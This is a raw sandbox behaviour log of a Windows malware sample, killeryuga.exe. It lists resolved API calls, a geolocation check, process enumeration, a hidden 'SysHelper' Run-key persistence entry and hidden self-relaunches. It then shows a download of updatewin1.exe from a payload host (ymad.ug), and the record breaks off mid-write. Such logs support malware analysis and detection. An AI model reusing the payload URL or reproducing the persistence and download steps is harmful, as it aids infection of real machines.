Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x74f57136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x74d67144 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Module Load module_name = OLEAUT32.dll, base_address = 0x75220000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x75223eae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x75223ed5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x75225dee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x75224af8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x75223e59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x75223f21 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x75224642 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x7522fd6b True 1
Fn
Module Load module_name = IPHLPAPI.DLL, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Module Load module_name = WS2_32.dll, base_address = 0x75bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x75bc311b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x75bd7673 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x75bcb131 True 1
Fn
Module Load module_name = DNSAPI.dll, base_address = 0x74a80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x74a8436b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:32 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 17649686175 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75140000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 1024 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
COM Create interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:33 (UTC) True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Service Open database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, os_pid = 0x9d0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, os_pid = 0x9d8, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window Create window_name = LPCWSTRszTitle, class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
Thread 0x9c8
111 138
»
Category Operation Information Success Count Logfile
Module Load module_name = Shell32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathA, address_out = 0x760e7804 True 1
Fn
File Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = ymad.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /tesptc/loadman/updatewin1.exe True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://ymad.ug/tesptc/loadman/updatewin1.exe True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
Fn
Data
Inet Read Response size = 10240, size_out = 10240 True 1
Fn
Data
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin1.exe, size = 10240 True 1
